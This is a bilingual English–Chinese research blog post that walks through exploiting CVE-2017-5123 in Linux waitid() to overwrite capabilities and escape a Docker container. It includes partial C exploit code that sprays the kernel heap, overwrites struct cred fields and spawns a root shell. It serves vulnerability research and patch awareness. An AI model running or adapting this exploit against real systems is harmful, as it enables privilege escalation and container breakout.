This post describes how I exploited the waitid() vulnerability to modify the Linux capabilities of a Docker container, gain elevated privileges, and ultimately escape the container jail. If you want to see how Twistlock would stop this vulnerability in its tracks, check out my follow-up blog.

這篇文章描述我如何利用 waitid() 修改 Docker 容器的 Linux capabilities 從而取得更高的權限,最後逃離了容器監獄。如果你想要看看 Twistlock 如何在他的軌跡中阻止這個弱點,在這篇文章有。

But before we dive in, since an image is worth a thousand words, here is my exploit in action. It modifies the capabilities structure of the containerized process in memory, which gains it the CAP_SYS_ADMIN and CAP_NET_ADMIN capabilities. This in turn makes it possible to enable promiscuous mode on eth0 (the Docker bridge for the container):

但在我們深入之前,一張圖勝過千言萬語,這是我的利用過程。它修改容器化行程在記憶體中的 capabilities 結構,導致取得 CAP_SYS_ADMIN 與 CAP_NET_ADMIN capabilities。這意味著有能力開啟 eth0 (容器的 docker bridge) 的混沌模式:

[YouTube video]

Note that I turned off kernel ASLR (KASLR) for the recording, but the exploit also works with KASLR enabled, as we can find the kernel base and the heap base by using the same vulnerability.

請留意我在影片中已經關掉 Kernel ASLR,但在 KASLR 的狀態下依然可以藉由同一個弱點成功找到核心基址與堆積基址。

CVE-2017-5123 was published earlier this year, on Oct 12. It is a Linux kernel vulnerability in the waitid() syscall that affects kernel versions 4.12-4.13. The waitid() syscall is defined as:

CVE-2017-5123 是今年 10 月 12 日發布 - 它是一個在 waitid() 系統呼叫的 Linux 核心 4.12-4.13 版本弱點。waitid() 系統呼叫定義為:

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

The vulnerability allows an attacker to write partially controlled data to a kernel memory address of their choice. The kernel memory address is supplied as the infop pointer above. The pointer points to a struct siginfo, described below. In this struct we can control several variables, specifically pid and status.


As you can see below, the control is rather indirect.


struct siginfo {
    int si_signo;
    int si_errno;
    int si_code;
    int padding; // this remains unchanged by waitid
    int pid;     // process id
    int uid;     // user id
    int status;  // return code
};

Most of the values either cannot be controlled by us or are too limited in size for our needs. However, we can control the pid value by creating a lot of processes with the help of fork() or clone() until we hit the desired pid value. Still, we are limited by the PID_MAX value of the system, which by default is 32768, or 0x8000 in hex.

多數的數值無法被我們控制,或是對我們來說在大小方面有所限制,然而我們可以藉由 fork() 或 clone() 的幫助創造很多行程,來控制 pid 的值,直到我們觸碰到想要的 pid 為止。但我們仍受限於系統中 PID_MAX 的值,預設為 32768 等於十六進位 0x8000
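To make the size limit concrete, here is a minimal sketch that checks whether a given 32-bit value could ever appear as a child's pid. The helper name pid_can_carry and the constant ASSUMED_PID_MAX are made up for this illustration; the constant simply encodes the default limit quoted above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Default limit quoted in the text; a real system may be configured differently. */
#define ASSUMED_PID_MAX 0x8000u

/* Hypothetical helper: true if `value` could show up as the pid of a child,
   i.e. 0 < value < PID_MAX. */
bool pid_can_carry(uint32_t value)
{
    return value > 0 && value < ASSUMED_PID_MAX;
}
```

Under this assumption pid_can_carry(0x7fff) holds, while 0x8000 and anything larger are out of reach.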

Note: In a non-containerized environment, once we change our uid to 0 and gain root privileges, we could raise this limit, as we could set /proc/sys/kernel/pid_max to any number.

註:在一個非容器的環境,我們可以在將 uid 設為0後提高這個數字,並取得 root 權限,如同我們可以修改 /proc/sys/kernel/pid_max 為任何數字。
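For reference, the current limit can be read from the same procfs file. This is only a sketch: read_pid_max is a name invented here, and it returns -1 when the file is not available (for example on a non-Linux system).

```c
#include <stdio.h>

/* Hypothetical helper: returns the value of /proc/sys/kernel/pid_max,
   or -1 if the file cannot be opened or parsed. */
long read_pid_max(void)
{
    long value = -1;
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");

    if (!f)
        return -1;
    if (fscanf(f, "%ld", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}
```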

Linux Capabilities

In this section I’ll focus on a short overview of Linux capabilities - what they are, how Docker uses them, and how they are represented in the memory.

在這個章節我將專注在簡短概觀的 Linux capabilities - 它們是什麼,與Docker 如何使用它們,與它們在記憶體中如何被表示。

The code snippet below is taken from linux/cred.h and is the definition of the credentials struct that each process has:

下方是從 linux/cred.h 擷取的程式碼片段 ,為每個行程的認證資訊結構:

struct cred {
    atomic_t usage;
    atomic_t subscribers; /* number of processes subscribed */
    void *put_addr;
    unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
    kuid_t uid; /* real UID of the task */
    kgid_t gid; /* real GID of the task */
    kuid_t suid; /* saved UID of the task */
    kgid_t sgid; /* saved GID of the task */
    kuid_t euid; /* effective UID of the task */
    kgid_t egid; /* effective GID of the task */
    kuid_t fsuid; /* UID for VFS ops */
    kgid_t fsgid; /* GID for VFS ops */
    unsigned securebits; /* SUID-less security management */
    kernel_cap_t cap_inheritable; /* caps our children can inherit */
    kernel_cap_t cap_permitted; /* caps we're permitted */
    kernel_cap_t cap_effective; /* caps we can actually use */
    kernel_cap_t cap_ambient; /* Ambient capability set */
    /* ... remaining fields omitted ... */
};

man capabilities:

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.

從核心 2.2開始,Linux 將傳統與超級使用者相關聯的權限分成不同的單元,可被個別啟用及停用,並稱之為 capabilities。每個執行緒都會有各自的 Capabilities 屬性。

Linux capabilities are stored inside each process’s own cred struct and are represented by a bitmask. For example, a process with all caps enabled would have a bitmask of 0xFFFFFFFFFFFFFFFF.

Linux capabilities 被儲存在每個行程自己的 cred struct 並使用 bitmask 來表示。例如所有的 caps 都被啟用的話,則用 bitmask 表示成 0xFFFFFFFFFFFFFFFF

Each capability provides a different set of permissions, for instance:

每個 capability 提供一個不同的權限分配,舉例來說:

CAP_SYS_MODULE - allows for loading & unloading kernel modules.

CAP_NET_ADMIN - allows for various network operations. For example entering promiscuous mode, interface configuration and more.

CAP_SYS_ADMIN - enables a range of system administration operations such as quotactl, mount, umount, swapon, setdomainname, ptrace and much more (this cap gives the most privileges and overloads others).

CAP_SYS_MODULE - 允許載入或卸載核心模組。

CAP_NET_ADMIN - 允許數種網路操作,例如開啟混沌模式,介面設定等等。

CAP_SYS_ADMIN - 啟用一個範圍內的系統管理操作,如 quotactl, mount, umount, swapon, setdomainname, ptrace 等等(這個 cap 給了最多權限並會多載其他的 cap)。 (編按:這個權限在 Linux manual 中建議最好避免使用,畢竟會賦予非常多的權限,幾乎可以說是一個另類的 root,除非須需求幾乎等同於此 cap,否則建議能避則避。)
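As a small illustration of the bitmask representation, the sketch below tests individual capability bits in a 64-bit mask. The bit numbers (12, 16, 21) are the values that linux/capability.h assigns to these three capabilities; the EX_ prefixed names and the two helper functions are made up for this example so that it compiles without kernel headers.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bit numbers from linux/capability.h, redefined locally under example names. */
enum {
    EX_CAP_NET_ADMIN  = 12,
    EX_CAP_SYS_MODULE = 16,
    EX_CAP_SYS_ADMIN  = 21
};

/* Mask with only the bit for `cap` set. */
uint64_t cap_bit(int cap)
{
    return UINT64_C(1) << cap;
}

/* True if `mask` grants `cap`. */
bool has_cap(uint64_t mask, int cap)
{
    return (mask & cap_bit(cap)) != 0;
}
```

For instance, has_cap(0xFFFFFFFFFFFFFFFF, EX_CAP_SYS_ADMIN) is true, whereas a mask such as 0x00000000a80425fb, a value commonly reported as the effective set of a default Docker container, has none of these three bits set.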

You can find the full list of CAPS over here.

你可以在這裡找到完整的 CAPS 清單。

Docker uses capabilities to provide better isolation for containers. It simply drops capabilities that would enable container escape. For example, you will rarely see a container running out-of-the-box with any of the 3 capabilities above, as it would be a security concern if a container could access the network interface and sniff the traffic of other containers or the host itself, or if a user inside the container could mount directories on the host and load kernel modules.

Docker 使用 capabilities 來為容器提供一個較好的隔離環境。Docker 純粹的將可能造成脫離容器的 capabilities 拿掉。例如,你會幾乎看不到一個容器運行在限制之外,有著上述三個 capabilities 的任何一個,當一個容器可以存取網路介面並嗅探其他容器或是主機的流量,或是一個在容器中的使用者可以在主機上掛上目錄並且載入核心模組,這些都是有安全疑慮的。

Although it might be easier to build a ROP chain and call commit_creds(0) to gain root with full capabilities, I wanted to learn more about heap spraying, so I decided to go with the blind exploitation method and spray the kernel heap with thousands of struct creds, like Federico did. The downside of this exploit is that full caps are impossible to reach: we are not in control of what we are writing (we are limited to 0x8000), so the value 0xFFFFFFFFFFFFFFFF is out of reach for us.

雖然造一個 ROP鏈來呼叫 commit_creds(0) 以獲得 root 權限與全部的 capabilities 似乎來的更簡單一點,但為了學到更多與堆積噴灑相關的技巧,並且在不知道目標環境下的漏洞利用方法,就像 Federico 做的一樣,將數千個 creds 結構噴好噴滿到核心堆積中。這個漏洞利用的缺點就是無法取得全部的 caps,因為我們無法控制寫入的東西(我們受限於 0x8000 的限制) 而且 0xFFFFFFFFFFFFFFFF 對我們來說是不可能達到的。

The vulnerability / 弱點成因

The code snippet below is taken from kernel/exit.c and is in charge of handling the waitid() syscall:

這是從 kernel/exit.c 取得的程式碼片段,負責處理系統 呼叫 waitid():

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
                infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    /* highlighted: this is the check that was missing in the vulnerable kernels */
    if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
        return -EFAULT;

    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

The vulnerability is that the highlighted access_ok() check, which ensures that the user-specified pointer is in fact a user-space pointer, was missing in the waitid() syscall. Without this check, a user can supply a kernel address pointer and the syscall will write to it without objection when executing unsafe_put_user().

弱點在於有醒目提示的 access_ok() 檢查,用來保證使用者指定的指標是屬於使用者空間的指標,在 waitid() 系統呼叫中少了這個檢查,缺了這個檢查,使用者可以提供一個核心地址指標,當執行 unsafe_put_user 時系統呼叫會毫無異議的寫入該位址。
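Conceptually, the missing check boils down to a range test on the pointer. The following user-space model is only a sketch of that idea, not the kernel's implementation: user_range_ok is a made-up name, and ASSUMED_USER_LIMIT is an assumed upper bound of user space for x86-64 with 4-level paging.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: top of the user address space on x86-64 with 4-level paging. */
#define ASSUMED_USER_LIMIT UINT64_C(0x00007ffffffff000)

/* Simplified model of an access_ok()-style check: the whole range
   [addr, addr + size) must lie below the user-space limit. */
bool user_range_ok(uint64_t addr, size_t size)
{
    if (size > ASSUMED_USER_LIMIT)
        return false;
    /* Written this way to avoid overflow in addr + size. */
    return addr <= ASSUMED_USER_LIMIT - size;
}
```

With this model, an ordinary user pointer such as 0x1000 passes, while a kernel heap address like 0xffff880023cc1004 is rejected, which is exactly the rejection the vulnerable waitid() never performed.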

As we already know - we can’t simply write whatever we want, but we will have to try to gain as much as we can within these limitations.

如同我們已經知道的 - 我們不能任意的想寫入哪裡就寫入哪裡,但我們必須在這些限制之下,竭盡我們所能的嘗試獲取可寫位址。

info.status is a 32-bit int, but the value of status is constrained to 0 < status < 256, as we can see in the exit codes documentation, and as we already know, pid is constrained by PID_MAX.

info.status 是一個 32bit 整數,但狀態的值被約束在 0 與 256 之間,就像我們在 exit 程式碼文件看到的,同時我們也知道 pid 被 PID_MAX 約束了。

At this point we have the ability to write a pid value, 0 < pid < 0x8000, anywhere we want. The next challenge is to work out where we should write in order to successfully overwrite the desired values.

目前我們有寫入 pid 值得能力: 介於 0 到 0x8000,到任意我們想要的地方,下一個挑戰是偵測到我們該寫到的位置,才能成功的覆寫想要的值。

We need to remember that the syscall actually writes 6 different fields each time we execute it, as there are 6 executions of unsafe_put_user().

我們需要記得,系統呼叫在每次執行的時候,實際上會寫入 6 個不同欄位,因為有 6 個 unsafe_put_user() 被執行了。
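The side effect of those six writes can be modelled in user space. The sketch below replays them into an ordinary byte buffer, using the field offsets of the simplified struct siginfo shown earlier (0, 4, 8, 16, 20, 24); the function and constant names are invented for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Field offsets taken from the simplified struct siginfo shown earlier. */
enum {
    OFF_SIGNO = 0, OFF_ERRNO = 4, OFF_CODE = 8,
    OFF_PID = 16, OFF_UID = 20, OFF_STATUS = 24
};

/* Store one 32-bit value at base + off. */
static void put32(uint8_t *base, size_t off, int32_t v)
{
    memcpy(base + off, &v, sizeof v);
}

/* Replays the six stores of waitid() into a local buffer of at least 28 bytes. */
void simulate_waitid_writes(uint8_t *infop, int32_t signo, int32_t code,
                            int32_t pid, int32_t uid, int32_t status)
{
    put32(infop, OFF_SIGNO, signo);
    put32(infop, OFF_ERRNO, 0);
    put32(infop, OFF_CODE, code);
    put32(infop, OFF_PID, pid);
    put32(infop, OFF_UID, uid);
    put32(infop, OFF_STATUS, status);
}
```

Running it on a buffer pre-filled with a marker byte shows that 24 of the 28 bytes starting at infop are clobbered and only the 4 padding bytes at offset 12 survive, so every write of a chosen pid also overwrites its neighbours.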

So we need to take into account the offset of pid inside the siginfo struct: we subtract that offset from the target address and pass the result to the waitid() syscall as the infop pointer.

所以我們需要帶入 infop 結構中 pid 的帳戶偏移值,並使用它減去到 waitid() 呼叫的目標位址的值作為 infop 指標。
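The pointer adjustment can be written down directly with offsetof. This sketch uses the libc definition of siginfo_t rather than the simplified struct above, and infop_for_target is a name chosen for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the value to pass as infop so that the si_pid field
   lands exactly on `target`. */
uintptr_t infop_for_target(uintptr_t target)
{
    return target - offsetof(siginfo_t, si_pid);
}
```

On a typical x86-64 Linux system this offset is expected to be 0x10, which matches the position of pid in the simplified struct shown earlier.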

Our main goal with this exploit is to overwrite the capabilities that Docker sets for us, thus gaining additional privileges and escaping the container.

我們使用這個漏洞利用的主要目標是,覆寫 Docker 為我們設定的 capabilities,就可以獲得額外的權限並且逃離容器。

Spray n’ Pray / 噴灑並禱告

I decided to take an approach similar to Federico's, so I sprayed the kernel heap with thousands of struct creds and then started guessing, writing to various addresses and praying to hit my target.

我決定使用與 Federico 相似的方法,所以我用數千個 creds 結構將核心堆積噴好噴滿,然後開始透過寫入不同位址來猜測,禱告並祈求可以擊中我的目標。

To know when a guess lands, we pick a value that we can track, such as uid (which we can track with getuid()).

藉著選一個我們可以追蹤的值如 uid (我們可以使用 getuid() 來追蹤)。

With a little bit of luck, we can pinpoint the location of our struct cred, after which we will be able to write to specific offsets in order to overwrite the capabilities, gid, euid and anything else we want.

幸運的話,我們可以做到的,指向我們的 struct cred 位置,之後我們將能寫到指定的偏移,就可以覆寫 capabilities, gid, euid 與其他任何我們想要的東西。

But in order to do that we need to figure out the actual offsets, which we will do with the help of gdb:

但為了要實現,我們需要搞清楚真實的偏移值,我們將依靠 gdb 的幫助來實現:

As we can see, kuid_t is 4 bytes in size. So if we found uid at 0xFFFF880023cc1004, then gid will be at 0xFFFF880023cc1008, 4 bytes above, and euid will be at 0xFFFF880023CC1014, which is 4*0x4=0x10 bytes above our uid address, as illustrated in the diagram below.

猶如我們看到的, kuid_t 是 4 個位元組的大小,因為醬子,如果我們在 0xFFFF880023cc1004 發現 uid ,那麼 gid 會在 0xFFFF880023cc1008, 4 個位元組之上,而 euid 會在 0xFFFF880023CC1014,就是 4*0x4=0x10(編按: 0x開頭是16進位,並非0乘4) 位元組之上,我們的 uid 位址,如下圖所示。
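The same arithmetic can be checked with a user-space mirror of the leading fields of struct cred. This is a sketch under an assumption: the mirror leaves out the debug-only fields (subscribers, put_addr, magic), which is consistent with the uid address ending in ...004 above. The struct and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the first fields of struct cred, assuming the
   debug fields are not compiled in and that kuid_t/kgid_t are 4 bytes. */
struct cred_ids_mirror {
    int32_t  usage;
    uint32_t uid;
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
};

/* Distance of a field from uid, given the field's offset in the mirror. */
size_t offset_from_uid(size_t field_offset)
{
    return field_offset - offsetof(struct cred_ids_mirror, uid);
}
```

Here offset_from_uid(offsetof(struct cred_ids_mirror, gid)) is 4 and the same call for euid gives 0x10, matching the addresses quoted above.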

So essentially, in order to overwrite our caps we will have to write to:

所以重要的是為了覆寫我們的 caps 將必須寫到:

address_of_uid+0x4*8 = address_of_uid+0x20 = address_of_cap_inheritable

Note: These addresses are relevant to my system, your addresses might differ.

註: 這些位址跟我的系統有相關聯,你的位址可能會不一樣。

In order to find out where our sprayed cred structs might land in the heap we will use gdb again and set a breakpoint on sys_getuid in order to break when our program calls getuid().

為了找到我們噴灑的 cred structs 在堆積中可能的落點,我們將再次使用 gdb 並設置一個中斷點在 sys_getuid 上,以便在程式呼叫 getuid() 的時候中斷下來。

A few step commands after the breakpoint (it took 5 on my system) should reveal the cred struct address in the RAX register.

斷下來後,步進幾個指令(在我的系統上是 5 個)應該會在 RAX 暫存器中顯示 cred struct 的位址。

We can repeat this process of finding the struct for a number of forks in order to collect enough addresses, and then analyze the statistics of where struct cred is most likely to be in the heap.

我們可以重複這個找結構的過程,藉由數個分叉(fork)以便收集足夠的位址並分析統計 struct cred 在堆積中最有可能的所在。

So the plan is as follows:


  1. Spawn thousands of processes by calling fork() in order to create thousands of cred structs in the kernel heap and make each of the processes constantly check if its UID==0 by calling getuid()
  2. Start writing the value 0 to addresses to which the struct cred->uid might land
  3. If and when one of our forked processes gets uid==0, it means that we have successfully overwritten the uid value with our guesses from step 2. Now we can overwrite the rest of the cred struct and change caps by writing to the offsets that we determined.
  1. 為了在核心堆積中創造數千個 cred structs 需要透過呼叫 fork() 產生數千個行程,並且呼叫 getuid() 使每個行程都不斷地檢查它自己的 UID 是否為 0
  2. 開始將 0 寫入位 struct cred->uid 可能的落點位址中
  3. 當其中一個我們分叉(fork)出來的行程獲得 uid 為 0,就代表我們已經成功從第二步猜測到並覆寫了uid的值。現在我們可以覆寫 cred struct 其餘的部分並藉由覆寫我們計算的值來修改 caps。
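The coordination pattern behind step 1 and step 3, many forked children polling while one shared flag tells them when to stop, can be tried safely in user space. The sketch below contains no exploit logic: it only forks a few children that wait on a flag placed in a MAP_SHARED | MAP_ANONYMOUS mapping. The function name spawn_and_release is made up for this example.

```c
#define _DEFAULT_SOURCE
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Forks n children that poll a shared flag, releases them, and returns how
   many exited with status 0 (or -1 if the shared mapping could not be made). */
int spawn_and_release(int n)
{
    volatile int *flag = mmap(NULL, sizeof *flag, PROT_READ | PROT_WRITE,
                              MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    int started = 0;
    int clean = 0;

    if (flag == MAP_FAILED)
        return -1;
    *flag = 0;

    for (int i = 0; i < n; i++) {
        pid_t pid = fork();
        if (pid == 0) {
            /* Child: poll the flag, the way the sprayed processes poll getuid(). */
            while (*flag == 0)
                usleep(1000);
            _exit(0);
        }
        if (pid > 0)
            started++;
    }

    *flag = 1; /* visible to every child because the mapping is shared */

    for (int i = 0; i < started; i++) {
        int status;
        if (wait(&status) > 0 && WIFEXITED(status) && WEXITSTATUS(status) == 0)
            clean++;
    }
    munmap((void *)flag, sizeof *flag);
    return clean;
}
```

Calling spawn_and_release(4) should return 4 on a system where fork() succeeds. A shared anonymous mapping is used because ordinary globals are copied on fork and would not be seen by the other processes.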

Our dirty exploit will be something to the effect of:


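/* exit_func, new_stack, glob_var, finalcapsaddress, value and findbase()
   belong to the full exploit and are not shown in this excerpt. */

void writecaps(char *addr, unsigned long value) {
    while (1) {
        /* Keep creating children until one of them gets the pid we want to write. */
        int pid = clone(exit_func, &new_stack[5000], CLONE_VM | SIGCHLD, NULL);
        if (!pid) {
            return;
        }
        if ((unsigned long)pid == value) {
            /* waitid() stores this pid through the unchecked pointer. */
            syscall(SYS_waitid, P_PID, pid, addr, WEXITED, NULL);
            return;
        }
    }
}

void spraynpray() {
    pid_t pid;
    char *argv[] = {"/bin/sh", NULL};

    for (int i = 0; i < 5000; i++) {
        pid = fork();
        if (pid == 0) { // child process
            while (1) {
                if (*glob_var == 1) {
                    // another child already got uid 0
                    syscall(SYS_exit, 0);
                }
                if (getuid() == 0) {
                    printf("[+] Got UID: 0 !\n");
                    *glob_var = 1;
                    writecaps((char *)finalcapsaddress, value);
                    printf("Done, spawning a shell \n");
                    execve("/bin/sh", argv, NULL);
                }
            }
        } else if (pid < 0) {
            printf("failed to fork");
        }
        // parent process: keep spraying
    }
}

void swapuid() {
    char *i;

    /* Start address and stride come from the analysis of my system. */
    for (i = (char *)0xffff8800321b4004; *glob_var == 0; i += 0xc0) {
        printf("trying %p\n", i);
        /* No child matches pid 0, so the call fails, but the vulnerable
           kernel still writes zeroed fields through the pointer. */
        syscall(__NR_waitid, P_PID, 0, (siginfo_t *)i, WEXITED, NULL);
    }
    munmap(glob_var, sizeof *glob_var);
    printf("Found uid on %p\n", i - 0xc0);
}

int main(void) {
    glob_var = mmap(NULL, sizeof *glob_var, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    *glob_var = 0;

    unsigned long *base = findbase();
    /* ... the rest of main is not shown in this excerpt ... */
}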

After analyzing my system (Ubuntu 17.10, kernel 4.13.0-15, arch x86-64), I found a couple of areas where the cred struct seemed to land in about 70% of the executions. There is still a risk of crashing the machine, though, because we may overwrite something important in the kernel.

在分析我的系統資後 (Ubuntu 17.10, 核心 4.13.0-15, 架構 x86-64),我發現數個區域貌似是運行時 creds 結構有 70% 以上的落點,但那仍然有使機器掛掉的風險存在,因為我們可能會覆寫到核心中重要的東西。

Conclusion / 結論

In 2017 alone, 434 Linux kernel exploits were found, and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, so trusting the built-in protection mechanisms alone isn’t sufficient. Make sure your kernel is always up to date on all of your production hosts.

光是 2017 年就已經有 434 個 Linux 核心漏洞利用被發現,如同你在這篇文章中看到的一樣,核心漏洞利用對容器環境來說是具毀滅性的。這是因為容器與主機分享核心,因此光是信任內建的保護機制並不足夠。確保你的核心在所有的產品主機都總是最新的。

Thank you for reading and don’t forget to follow us @TwistlockLabs.

謝謝你的閱讀,別忘了在 @TwistlockLabs 跟隨我們。

Big credits to Federico Bento for pointing some things out and to Chris Salls for his Chrome sandbox escape exploit; my exploitation is heavily based on their work.

給點清了某些事情的Federico Bento一個大大的讚, Chris Salls也是,感謝他的 Chrome 沙盒逃脫漏洞利用; 我的漏洞利用大多數是基於他們的成果。